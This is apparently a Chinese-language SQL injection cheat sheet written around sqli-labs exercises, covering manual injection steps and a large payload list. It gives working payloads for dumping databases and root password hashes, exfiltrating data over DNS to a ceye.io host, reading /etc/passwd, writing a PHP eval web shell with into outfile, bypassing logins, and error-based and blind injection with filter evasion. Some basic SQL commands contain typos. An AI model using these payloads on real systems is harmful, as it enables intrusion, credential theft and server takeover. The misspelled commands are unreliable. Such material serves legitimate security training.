SQL注入常用命令_列出常用的命令注入时的命令

1. 数据库查询版本

• Mssql select @@version
• Mysql select vresion（）/select @@version
• oracle select banner from ￥version
• Postgresql select version（）

2. 数据库常用命令

• 库操作

  • 连接数据库 mysql -u 用户名 -p
  • 创建数据库：create database 数据库名称、
  • 删除数据库 drop database 数据库名称、
  • 列出数据库 show databases
  • 使用数据据库 use 数据库名称、
  • 查看当前数据库 select database（）

• 表操作

  • 新建表create table 表名（键 varchar（10），键int（10））
  • 列出表 show tables
  • 删除表 delete 表名

• 数据操作

  • 增加数据insert into 表名（键，键）values（值，值）

  • 删除数据 delete from 表名 where 键=值（删除某一行数据）

  • 修改数据 updata 表名 set 键 = 值 where 键=值

  • 查询数据 select * fom 表名

    存放数据库 information_ schema（存放schemata、 table、columns等等）

    存放数据库名 schemata

    表 table

    字段 columns

3. SQL手工注入步骤

注入点寻找

• 判断请求方式

  • 浏览器F12 点网络

• 单引号闭合’ ‘

• 数字

• 单引号括号闭合（’ ‘）

• 双引号括号闭合（“ ”）

• or 1=1

• or 1=2

• and 1=1

• and 1=2

• 数字型注入

  • 加单引号 错误出异常
  • and 1=1 正常
  • and 1=2 异常

• 字符型注入

  • 加单引号 错误出异常
  • and ‘1’ = '1 正常
  • and ‘1’ = '2 异常

判断字段长度

• order by 数字 可以判断字段的个数

• 也可以用猜字段 union select 1，2，3

判断字段回显位置

在链接后面添加语句【 union select 1,2,3,4,5,6,7,8,9,10,11#】进行联合查询（联合查询时记得把前面的查询为空）来暴露可查询的字段号。

判断数据库注入

利用内置函数暴数据库信息
version()版本；database()数据库；user()用户；
不用猜解可用字段暴数据库信息(有些网站不适用):
and 1=2 union all select version()
and 1=2 union all select database()
and 1=2 union all select user()
操作系统信息：and 1=2 union all select @@global.version_compile_os from mysql.user
数据库权限：
and ord(mid(user(),1,1))=114 返回正常说明为root

查找数据库名

• GET：IP/Less-1/?id=100’ union select 1,(select database()),3–+

• POST：union select 1,(select group_concat(schema_name) from information_schema.schemata),3–+

• 查看数据库长度length（） and length(database())>10–+

• 查看数据库名字mid（）或者left

  • mid (string，start，length）返回指定的字符串从指定位置开始（可以用来猜数据库名 ） and mid(database(),1,1)>‘a’

  • left (string,lenth) 返回最左边指定的字符数

    and left(database(),1)>‘a’ (猜名字)

• 将查到的库名放到同一个字符串

  • select GROUP_CONCAT(schema_name) from information_schema.schemata

• 查到数单个据库名发送到ceye

  • union select 1,(select load_file(concat(’\\’,substr((select schema_name from information_schema.schemata limit 1),1,41),’.mysql.ip.port.38ljf2.ceye.io\abc’)))–+

查找数据表

• union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’) ,3

• 将单个表名发送到ceye

  uname=1’) union select 3,(select load_file(concat(’\\’,substr((select table_name from information_schema.tables where table_schema =‘security’ limit 1),1,41),’.mysql.ip.port.38ljf2.ceye.io\abc’)))–+

查找数据表中所有字段（列）

• 127.0.0.1/Less-3/?id=100’) union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’) --+

• 获取内容

  • union select 1,(select group_concat(username) from security.users limit 0,1),3

• 查询某一个表的字段名发送到ceye

  • union select 1,(select load_file(concat(’\\’,substr((select column_name from information_schema.columns where table_name=‘users’ and table_schema=‘security’ limit 1),1,41),’.mysql.ip.port.38ljf2.ceye.io\abc’)))–+

猜解账号密码

• outfile文件注入

  • union select 1,’<?php @eval($_POST[360]);?>’ into outfile ‘C:\phpStudy\PHPTutorial\WWW\Less-8\3.php’–+

  • into outfile ‘C:\phpStudy\PHPTutorial\WWW\Less-13\1.txt’

• 查root密码ceye代码

  127.0.0.1/Less-1/?id=1’ union SELECT 1,(LOAD_FILE(CONCAT(’\\’,mid((SELECT password FROM mysql.user WHERE user=‘root’ LIMIT 1),2,41),’.mysql.ip.port.38ljf2.ceye.io\abc’))),3–+

• bug

  uname=1’) or 1=1 into outfile ‘C:\phpStudy\PHPTutorial\WWW\Less-13\1.txt’;–+

  这个文件里会有所有的用户名和密码

• 查询数据

  union select 1,(select 1 from (select count(*),concat((select(select(select distinct concat(username,password) from users limit 0,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

绕过登陆验证

• admin’ –
• admin’ #
• admin’/*
• ’ or 1=1–
• ’ or 1=1#
• ’ or 1=1/*
• ') or ‘1’='1–
• ') or (‘1’='1–

SQL注入常见函数

• group_concat函数 可以把查询的内容组合成一个字符串

• load_file(file name ) 读取文件并将文件按字符串返回

• left（string，length）返回最左边指定的字符数：
  left（database（），1）>‘s’ (猜名字)

• length（）判断长度
  length（database（）>5

• substr（a，b，c）从字符串a中截取 b到c长度

• ascii（）将某个字符转为ascii值

  ascii（substr（user（），1，1））=101#

• mid（（a，b，c）从字符串a中截取 b到c位置（可以用来猜数据库名 ）

4.SQL注入手册

SQL注入常用命令

• 查看当前用户：union select 1,(select user())–+

• 查看数据库版本：union select 1,(select version())–+

• 查看当前数据库名：union select 1,(select database())–+

• 查看操作系统union select 1,(select @@version_compile_os)–+

• 所有用户：

  • union select 1,(select group_concat(user) from mysql.user)–

• 用户hash

  • union select 1,(select group_concat(password) from mysql.user where user=‘root’)

• 查看所有数据库名

  • union select 1,(SELECT group_concat(schema_name) from information_schema.schemata)–+

• 查看某一个库的全部表

  • union select 1,(SELECT group_concat(table_name) from information_schema.tables where table_schema=‘库名’)–+
  • union select 1,(SELECT group_concat(table_name) from information_schema.table_constraints where table_schema=‘库名’

• 查看某个表的字段名

  • union select 1,(SELECT group_concat(column_name) from information_schema.columns where table_name=‘表名’)–+

• 查看某个库中某个表的字段名

  • union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘表名’ and table_schema=‘库名’)–+

• 读文件

  • union select 1,(SELECT load_file(’/etc/passwd’))–+

• 写文件

  • union select 1,’<?php @eval($_POST[360]);?>’ into outfile ‘C:\phpStudy\PHPTutorial\WWW\Less-8\3.php’–+

UNION注入

• 猜字段长度

  • order by 数字 uname=1’ order by 2

• 暴字段位置

  • union select 1,2 uname=1’ union select 1,2

• 在指定表中查询制指定用户的密码

  • union SELECT 1,password from 表 where username=‘用户名’–+

报错注入

• floor （SELECT user()可修改）

  • OR (SELECT 8627 FROM(SELECT COUNT(*),CONCAT(0x70307e,(SELECT user()),0x7e7030,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)–+

• ExtractValue(有长度限制,最长32位) （select @@version可修改）

• and extractvalue(1, concat(0x7e, (select @@version),0x7e))–+

• UpdateXml(有长度限制,最长32位) （SELECT @@version可修改）

• and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)–+

• NAME_CONST(适用于低版本，不太好用)

• and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)–+

• Error based Double Query Injection

• or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1–+

• exp(5.5.5以上) （select user()可修改）

• and (select exp(~(select * from(select user())x)))–+

• floor(Mysql): and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

• Extractvalue(Mysql): and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

• Updatexml(Mysql): and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

• EXP: and exp(~(select * from(select user())a));

• UTL INADDR. get host address(Oracle): and 1=utl inaddrget host address(select bannerO from sys.v_$version where rownum=1))

• multipoint(Mysql)：and multipoint((select * from(select * from(select user())a)b));

• polygon(Mysql)：and polygon((select * from(select * from(select user())a)b));

• multipolygon(Mysql)：and multipolygon((select * from(select * from(select user())a)b));

• linestring(Mysql)：and linestring((select * from(select * from(select user())a)b));

• multilinestring(Mysql)：and multilinestring((select * from(select * from(select user())a)b));

bool盲注

• 盲注的时候一定注意，MySQL4之后大小写不敏感，可使用binary()函数使大小写敏感。

• 布尔条件构造

   //正常情况
   'or bool#
   true'and bool#
       
   //不使用空格、注释
   'or(bool)='1
   true'and(bool)='1
       
   //不使用or、and、注释
   '^!(bool)='1
   '=(bool)='
   '||(bool)='1
   true'%26%26(bool)='1
   '=if((bool),1,0)='0
       
   //不使用等号、空格、注释
   'or(bool)<>'0
   'or((bool)in(1))or'0
       
   //其他
   or (case when (bool) then 1 else 0 end)
  1
  2
  3
  4
  5
  6
  7
  8
  9
  10
  11
  12
  13
  14
  15
  16
  17
  18
  19
  20
  21

  • 有时候where字句有括号又猜不到SQL语句的时候，可以有下列类似的fuzz

   1' or (bool) or '1'='1
   1%' and (bool) or 1=1 and '1'='1
  1
  2
  1
  2

• 构造逻辑判断

  • 逻辑判断基本就那些函数：

    left(user(),1)>'r'  
    right(user(),1)>'r'  
    substr(user(),1,1)='r'  
    mid(user(),1,1)='r' 
        
    //不使用逗号 
    user() regexp '^[a-z]'
    user() like 'root%'
    POSITION('root' in user())
    mid(user() from 1 for 1)='r'
    mid(user() from 1)='r'
  1
  2
  3
  4
  5
  6
  7
  8
  9
  10
  11

• 利用order by盲注

  mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3;
  +----+--------------+------------------------
  | id |    username  | password                   
  +----+--------------+------------------------
  |  1 | 2            | 5                         
  |  1 | admin        | 51b7a76d51e70b419f60d34 
  +----+----------- --+------------------------
  2 rows in set (0.00 sec)
      
  mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3;
  +-----+-----------+--------------------------
  |id   | username  | password                  
  +-----+-----------+--------------------------
  |  1  | admin     |51b7a76d51e70b419f60d3
  |  1  |    2      | 6                          
  +-----+-----------+--------------------------
  2 rows in set (0.01 sec)
  1
  2
  3
  4
  5
  6
  7
  8
  9
  10
  11
  12
  13
  14
  15
  16
  17
  1
  2
  3
  4
  5
  6
  7
  8
  9
  10
  11
  12
  13
  14
  15
  16
  17

延时盲注

• 相对于bool盲注，就是把返回值0和1改为是否执行延时，能用其他方法就不使用延时。

• 一般格式if((bool),sleep(3),0)和or (case when (bool) then sleep(3) else 0 end)

• 两个函数：

• BENCHMARK(100000,MD5(1))

• sleep(5)

• BENCHMARK()用于测试函数的性能，参数一为次数，二为要执行的表达式。可以让函数执行若干次，返回结果比平时要长，通过时间长短的变化，判断语句是否执行成功。这是一种边信道攻击，在运行过程中占用大量的cpu资源。推荐使用sleep()

Mysql注释符

1. -- -
2. /* .... */
3. #
4. `
5. ;%00 
1
2
3
4
5
1
2
3
4
5

GBK绕过注入

• 在分号前加%df%27
• 示例：id=1%d%27 union select 1.2–+